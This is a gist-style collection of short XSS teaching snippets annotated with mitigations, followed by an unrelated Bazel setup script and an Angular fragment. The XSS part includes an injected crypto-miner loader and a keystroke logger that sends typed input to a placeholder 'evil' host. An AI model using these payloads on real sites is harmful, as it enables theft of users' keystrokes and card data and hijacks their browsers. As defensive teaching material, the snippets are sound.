
Stepan Suvorov stevermeister

View xss.js
// Vulnerable example (DOM-based XSS): the "user" query parameter is controlled by
// whoever builds the link, and it is concatenated into markup without encoding.
// Source: location.href -> searchParams.get("user") (null when the parameter is absent).
var url = new URL(location.href).searchParams.get("user");
// Sink: jQuery .append() parses the string as HTML, so the value is interpreted as
// markup rather than as data.
// Safer: create the element first and assign the value as data, e.g.
//   $('<input type="hidden">').val(url).appendTo('#form');
$('#form').append('<input type="hidden" value="' + url + '">');
View not_trusted.js
// DOM XSS sink: innerHTML parses its input as HTML, and location.hash (minus the
// leading "#") is chosen by whoever builds the link.
// With Trusted Types enforced (CSP: require-trusted-types-for 'script') a plain
// string like this is rejected unless a default policy converts it. Use
// textContent when the value is meant to be text.
el.innerHTML = location.hash.slice(1); //string
View trusted_types.js
// innerHTML stringifies whatever it is given, so an object with toString() is
// accepted. Trusted Types builds on this: the sink receives a TrustedHTML object
// produced by a policy instead of a raw string.
// Under enforcement, an ad-hoc object like this one is not a TrustedHTML and is
// handled the same way as a plain string.
el.innerHTML = { toString: () => 'hello' }
el.innerHTML // "hello"
View xss_coins.html
<!-- Example of what injected markup can do once XSS succeeds: it loads a third-party
     mining script and starts it in the visitor's browser. From the defender's side,
     a Content-Security-Policy whose script-src does not list this origin blocks the
     external load, and the inline block is blocked unless inline script is allowed. -->
<script src="https://coinhive.com/lib/coinhive.min.js">
</script>
<script>
var miner = new CoinHive.User('SITE_KEY', 'john-doe');
miner.start();
</script>
View xss_creditcard.js
// Example XSS payload (keystroke capture), shown to illustrate impact; the snippet
// continues past this excerpt, where the buffer is sent out through an image request.
// Mitigations: a CSP img-src / connect-src allow-list limits where the page can send
// data, and card fields hosted in a separate-origin iframe are not visible to a
// document-level handler on the embedding page.

// Buffer of every character typed on the page.
var keys='';
// A document-level keypress handler receives input typed into any field of the page.
document.onkeypress = function(e) {
// Fall back to the legacy global event object when it exists.
e = window.event?event:e;
// NOTE(review): `key` is never declared, so it becomes an implicit global.
key = e.keyCode?e.keyCode:e.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://evil.../log.php?c='+keys;
View xss_result.html
<!-- Resulting markup after the unencoded value is appended: the double quote in the
     value ends the attribute, "/>" ends the input, and the rest is parsed as a script
     element. Encoding the double quote for the attribute context, or setting the value
     through a DOM property, keeps the whole string inside the value.
     NOTE(review): the id is written "#form"; a selector of #form matches id="form". -->
<form id="#form">
<input type="hidden"
value="https://example.com"/><script>alert(1)</script>
</form>
View xss.html
.../?user=something<script>alert(1)</script>...
@stevermeister
stevermeister / bazel-start.sh
Last active Oct 5, 2018
Run to set up Bazel files for a fresh ng-cli project
View bazel-start.sh
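#!/usr/bin/env bash
# Set up Bazel build files for a fresh Angular CLI project by copying them from
# alexeagle/canonical-angularcli-app. Run from the project root; ./src and ./e2e
# must already exist.
#
# Stops at the first failure: without --fail, curl exits 0 on an HTTP error and
# the error body would be written into the build file.
set -euo pipefail

readonly RAW_BASE='https://raw.githubusercontent.com/alexeagle/canonical-angularcli-app'

# fetch REF PATH: download PATH as of REF into ./PATH, replacing the target only
# after a complete, successful HTTPS transfer.
fetch() {
  local ref="$1" path="$2"
  local tmp="./${path}.download"
  if ! curl --fail --silent --show-error --proto '=https' --tlsv1.2 \
      --output "${tmp}" "${RAW_BASE}/${ref}/${path}"; then
    rm -f "${tmp}"
    echo "fetch failed: ${path} @ ${ref}" >&2
    return 1
  fi
  mv "${tmp}" "./${path}"
}

# NOTE(review): installs the latest published version globally; pin a version if
# the build needs to be reproducible.
yarn global add @bazel/ibazel

# NOTE(review): "master" is a mutable ref, so these files can change between runs
# and are written into the build configuration unreviewed. Prefer a reviewed commit
# SHA, as the last two downloads already do.
fetch master .bazelrc
fetch master WORKSPACE
fetch master BUILD.bazel
fetch master src/BUILD.bazel
fetch master e2e/protractor.on-prepare.js
fetch master e2e/BUILD.bazel
fetch 236406851409a88e85b3cdc9e6eaa250061fd7cc src/main.ts
fetch 06151761ded53d22a2d03b9e6d67c31f045559af src/index.html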
View takeUntil.ts
export class TestComponent {
// Takes the Store as a constructor argument; the `private` parameter-property
// shorthand also declares it as the member this.store.
// NOTE(review): Store's origin is not visible in this excerpt; presumably the ngrx store, confirm.
constructor(private store: Store) { }
private componetDestroyed: Subject = new Subject();
todos: Subscription;
posts: Subscription;
ngOnInit() {
this.todosSubscription = this.store.select('todos').takeUntil(this.componetDestroyed).subscribe(console.log);